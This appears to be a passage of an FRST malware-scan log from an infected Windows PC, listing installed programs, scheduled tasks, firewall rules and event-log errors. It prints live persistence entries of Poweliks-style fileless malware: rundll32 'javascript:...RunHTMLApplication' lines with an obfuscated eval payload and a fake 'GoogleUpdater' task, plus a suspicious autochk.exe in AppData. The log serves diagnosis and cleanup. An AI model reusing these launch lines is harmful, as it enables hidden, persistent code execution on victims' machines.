HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{4ED7050C-9332-4FB2-AB07-E94F25A53D39}) (Version: 3.0.3 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{675D093B-815D-47FD-AB2C-192EC751E8E2}) (Version: 4.6.10.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.6.1 - Hewlett-Packard Company)
iscsicli (HKLM\...\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb) (Version:  - )
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6662 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.8400.29025 - Realtek Semiconductor Corp.)
Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.6.1.3 - Synaptics Incorporated)
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2321640021-2341620851-140482586-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2013-08-22 09:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {21C0BD54-D728-412C-9687-5BD843CE459F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {333FA58A-DFAA-4385-AA61-B33438154251} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-07-03] (Microsoft Corporation)
Task: {42606C78-3E7A-474E-9FB5-D30D039784CB} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {4C2BD9C4-DC7D-49BA-9C3C-04F32D4276BD} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {79265C83-DBF1-4920-878D-0F9B507752FF} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-05-16] (Synaptics Incorporated)
Task: {9D9C2496-8F90-45D0-95F6-D62F07B68205} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {A82515B8-3006-4D3A-88A8-FE04D02C7192} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {D40B0C6F-3A4C-4FBD-825B-B0A520FC47FB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {EBE40865-385F-454E-8EE7-98C98B1302B3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {F5715D4F-B262-4590-8487-ACEB028F19D5} - System32\Tasks\autochk => C:\Users\Richie\AppData\Roaming\Microsoft\Windows\IEUpdate\autochk.exe <==== ATTENTION
Task: {F788831C-2C82-4174-8FBD-CE944B364117} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
 
==================== Loaded Modules (Whitelisted) ==============
 
2012-08-06 15:09 - 2012-08-06 15:09 - 00073728 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2012-08-06 15:08 - 2012-08-06 15:08 - 00103424 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2013-04-23 03:39 - 2012-06-07 23:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 14:34 - 2012-06-08 14:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 01405768 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\libglesv2.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\libegl.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 16308040 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\Richie\OneDrive:ms-properties
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Richie\Pictures\first wallapaper.jpg
DNS Servers: 192.168.254.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{0367362F-B34E-4E4D-BFDA-641E8F62D018}] => (Allow) C:\Windows\system32\calc.exe
FirewallRules: [{AFB2689E-3ACF-464D-AB93-0860F07FE12D}] => (Allow) C:\Windows\system32\calc.exe
FirewallRules: [{F1733FB4-9B3E-400A-BB00-F6CC0B4C6073}] => (Allow) C:\Windows\system32\calc.exe
FirewallRules: [{484FB357-14FA-47F8-B46B-FD7927B427C4}] => (Allow) C:\Windows\system32\calc.exe
FirewallRules: [UDP Query User{EF808760-8554-4060-B4E7-D5950FC3902E}C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe] => (Block) C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe
FirewallRules: [TCP Query User{AB01AA61-E7EA-428A-A867-B57497C9F494}C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe] => (Block) C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe
FirewallRules: [UDP Query User{A9318B5F-F5DB-426E-AB8D-BBFCA3A38D4B}C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe] => (Allow) C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe
FirewallRules: [TCP Query User{0242F7F3-6EEB-418D-9D50-6F03F90397A9}C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe] => (Allow) C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe
FirewallRules: [UDP Query User{F7BB5D3C-46CF-4A8F-A8FB-D095D7908EB4}C:\programdata\windows genuine advantage\{417cb0b8-dd5d-4eca-aac2-29f72ed82c05}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{417cb0b8-dd5d-4eca-aac2-29f72ed82c05}\msiexec.exe
FirewallRules: [TCP Query User{FF68882B-DEC8-4FD2-AB9A-A31A33B28E78}C:\programdata\windows genuine advantage\{417cb0b8-dd5d-4eca-aac2-29f72ed82c05}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{417cb0b8-dd5d-4eca-aac2-29f72ed82c05}\msiexec.exe
FirewallRules: [UDP Query User{5672CFF1-5077-4832-A66D-5DC72472DEAA}C:\programdata\windows genuine advantage\{f2eac7ec-3a48-43e2-904f-a00d1e2b26a1}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{f2eac7ec-3a48-43e2-904f-a00d1e2b26a1}\msiexec.exe
FirewallRules: [TCP Query User{F350B76A-5709-4031-A0B2-A6792F59508F}C:\programdata\windows genuine advantage\{f2eac7ec-3a48-43e2-904f-a00d1e2b26a1}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{f2eac7ec-3a48-43e2-904f-a00d1e2b26a1}\msiexec.exe
FirewallRules: [UDP Query User{97979C99-34E0-4EC1-AF1A-8BAC2CE4CF89}C:\programdata\windows genuine advantage\{9f2ed5e0-8e8d-4d02-9679-9380819a8e32}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{9f2ed5e0-8e8d-4d02-9679-9380819a8e32}\msiexec.exe
FirewallRules: [TCP Query User{38C11876-2476-4982-9182-79E6C4F63D13}C:\programdata\windows genuine advantage\{9f2ed5e0-8e8d-4d02-9679-9380819a8e32}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{9f2ed5e0-8e8d-4d02-9679-9380819a8e32}\msiexec.exe
FirewallRules: [UDP Query User{0B3EE6F2-A56E-4E1A-88B5-D0BC77494E14}C:\users\richie\appdata\local\svcxdcl32.exe] => (Block) C:\users\richie\appdata\local\svcxdcl32.exe
FirewallRules: [TCP Query User{8C7D3494-C17B-4DC4-B100-AFC59270E026}C:\users\richie\appdata\local\svcxdcl32.exe] => (Block) C:\users\richie\appdata\local\svcxdcl32.exe
FirewallRules: [UDP Query User{60D6A347-AD97-4573-9543-4D9001A15122}C:\windows\syswow64\rundll32.exe] => (Block) C:\windows\syswow64\rundll32.exe
FirewallRules: [TCP Query User{15D61185-C31B-406A-807B-382C68B1E17B}C:\windows\syswow64\rundll32.exe] => (Block) C:\windows\syswow64\rundll32.exe
FirewallRules: [UDP Query User{BC7DF472-3B0B-451C-8A71-CBF119219BFB}C:\programdata\windows genuine advantage\{c6fad9c2-4cc9-424d-970e-64ea294868b4}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{c6fad9c2-4cc9-424d-970e-64ea294868b4}\msiexec.exe
FirewallRules: [TCP Query User{4D5AA3AC-4BF6-4CDD-B29F-76188BAD4E31}C:\programdata\windows genuine advantage\{c6fad9c2-4cc9-424d-970e-64ea294868b4}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{c6fad9c2-4cc9-424d-970e-64ea294868b4}\msiexec.exe
FirewallRules: [UDP Query User{48B40DE2-B00D-4312-B123-626009D258F8}C:\users\richie\appdata\local\svcxdcl32.exe] => (Block) C:\users\richie\appdata\local\svcxdcl32.exe
FirewallRules: [TCP Query User{9F15730A-F959-466B-94B9-02D3A01687C3}C:\users\richie\appdata\local\svcxdcl32.exe] => (Block) C:\users\richie\appdata\local\svcxdcl32.exe
FirewallRules: [{65ED69FA-B62D-4206-855D-64915622B516}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{58AB6517-29D5-488A-9694-8830A06A20E5}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{112A4FFD-ACB4-4865-BBAB-EAF9D1349E34}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{5F1791B8-A2D1-4AF6-ABC7-274A66B1FF3F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C2156354-BF49-409D-8C2B-6F9A9E0A341A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D58582AF-22E5-4C02-B344-27C8199D947D}] => (Allow) LPort=1900
FirewallRules: [{5BD7BD99-EDCD-4755-AAEF-AB70F3F31B7C}] => (Allow) LPort=2869
FirewallRules: [{0758B42B-2DD6-4329-8DF8-FAECA7B668B1}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7C6903FB-5408-496E-81FE-642B92E1AFE6}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (07/28/2015 04:35:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingWeather_8wekyb3d8bbwe!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/28/2015 04:24:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 41c
 
Start Time: 01d0c9724f6ca9a8
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 9da4f213-3566-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 04:14:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.7.205.0, time stamp: 0x54cb5aeb
Faulting module name: mpengine.dll, version: 1.1.9700.0, time stamp: 0x51d28fcb
Exception code: 0xc0000005
Fault offset: 0x00000000005615b7
Faulting process id: 0x11bc
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3
Faulting package full name: MsMpEng.exe4
Faulting package-relative application ID: MsMpEng.exe5
 
Error: (07/28/2015 04:12:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.7.205.0, time stamp: 0x54cb5aeb
Faulting module name: mpengine.dll, version: 1.1.9700.0, time stamp: 0x51d28fcb
Exception code: 0xc0000005
Fault offset: 0x00000000005615b7
Faulting process id: 0xaa8
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3
Faulting package full name: MsMpEng.exe4
Faulting package-relative application ID: MsMpEng.exe5
 
Error: (07/28/2015 04:11:58 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: b7c
 
Start Time: 01d0c970ef145790
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: e358a469-3564-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 04:09:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.7.205.0, time stamp: 0x54cb5aeb
Faulting module name: mpengine.dll, version: 1.1.9700.0, time stamp: 0x51d28fcb
Exception code: 0xc0000005
Fault offset: 0x00000000005615b7
Faulting process id: 0x544
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3
Faulting package full name: MsMpEng.exe4
Faulting package-relative application ID: MsMpEng.exe5
 
Error: (07/28/2015 03:53:28 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: b70
 
Start Time: 01d0c96e0fcb8811
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 4f54cd74-3562-11e5-8187-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 03:27:51 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: c28
 
Start Time: 01d0c96a6c9094da
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: b9e7cc70-355e-11e5-8187-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 03:20:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingTravel_8wekyb3d8bbwe!AppexTravel failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/28/2015 02:58:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: a2c
 
Start Time: 01d0c96649b3afff
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 96c3afc4-355a-11e5-8187-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
 
System errors:
=============
Error: (07/28/2015 04:14:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Windows Defender Service service terminated unexpectedly.  It has done this 3 time(s).
 
Error: (07/28/2015 04:12:10 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Defender Service service terminated unexpectedly.  It has done this 2 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (07/28/2015 04:09:08 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Defender Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:23 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
 
Microsoft Office:
=========================
Error: (07/28/2015 04:35:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Microsoft.BingWeather_8wekyb3d8bbwe!App-2144927148
 
Error: (07/28/2015 04:24:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.2091141c01d0c9724f6ca9a84294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe9da4f213-3566-11e5-8188-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 04:14:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: MsMpEng.exe4.7.205.054cb5aebmpengine.dll1.1.9700.051d28fcbc000000500000000005615b711bc01d0c971d3343371C:\Program Files\Windows Defender\MsMpEng.exeC:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\mpengine.dll397e2d38-3565-11e5-8188-2c59e5a5a8a3
 
Error: (07/28/2015 04:12:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: MsMpEng.exe4.7.205.054cb5aebmpengine.dll1.1.9700.051d28fcbc000000500000000005615b7aa801d0c971668a7970C:\Program Files\Windows Defender\MsMpEng.exeC:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\mpengine.dllecdf70cc-3564-11e5-8188-2c59e5a5a8a3
 
Error: (07/28/2015 04:11:58 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911b7c01d0c970ef1457904294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exee358a469-3564-11e5-8188-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 04:09:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: MsMpEng.exe4.7.205.054cb5aebmpengine.dll1.1.9700.051d28fcbc000000500000000005615b754401d0c970ce6678bbC:\Program Files\Windows Defender\MsMpEng.exeC:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\mpengine.dll7f020f21-3564-11e5-8188-2c59e5a5a8a3
 
Error: (07/28/2015 03:53:28 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911b7001d0c96e0fcb88114294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe4f54cd74-3562-11e5-8187-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 03:27:51 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911c2801d0c96a6c9094da4294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exeb9e7cc70-355e-11e5-8187-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
